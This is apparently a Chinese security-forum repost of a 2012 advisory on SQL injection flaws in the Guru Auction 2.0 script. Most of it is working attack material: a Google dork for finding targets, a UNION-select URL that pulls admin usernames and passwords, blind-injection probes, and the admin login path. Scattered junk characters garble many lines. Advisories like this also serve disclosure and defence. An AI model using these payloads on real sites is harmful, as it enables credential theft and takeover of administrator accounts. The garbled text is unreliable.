找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2195|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
9 F. M* U: m* a/ D, C' d" @* O2 \3 O% ^7 a! g
作者     : v3n0m
) \2 V, @- q9 M) G, D5 Y应用 : Guru Auction 2.0
- i0 v* n8 o# O5 e0 F" f' zPrice       : $49
, U; E' c# I* r# G1 w" oVendor      : http://www.guruscript.com/
' w) J, Y/ _( R3 \Google Dork : inurl:subcat.php?cate_id=
4 ^9 Q6 A& W6 P/ e
. i3 e% {! x% t( I: }SQLi p0c:1 o% \" t1 w9 p. d/ p
~~~~~~~~~~
+ V# b8 [8 U8 J- A- |& Bhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
- [) X7 [! `3 T9 h0 O/ h
; v; _1 S, G$ D4 Z
9 T' G6 _! x% v4 o5 N1 f" ~1 }盲注 p0c:
0 a5 y0 y, X7 n) L5 C~~~~~~~~~~
1 h1 e) W8 ]8 I  @http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
: x3 ^; y  H$ T3 j( d' r( T  a: {http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false/ K5 E  }+ ^, C) r3 C% y1 w
4 d' Y% n$ N# z  A2 H/ k
管理登录入口:# W' M1 d' c3 y. S* q
~~~~~~~~~~
9 L  k( G4 Q6 |/ Ghttp://domain.tld/[path]/admin/
  [4 Y6 l  Q* F% f/ O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表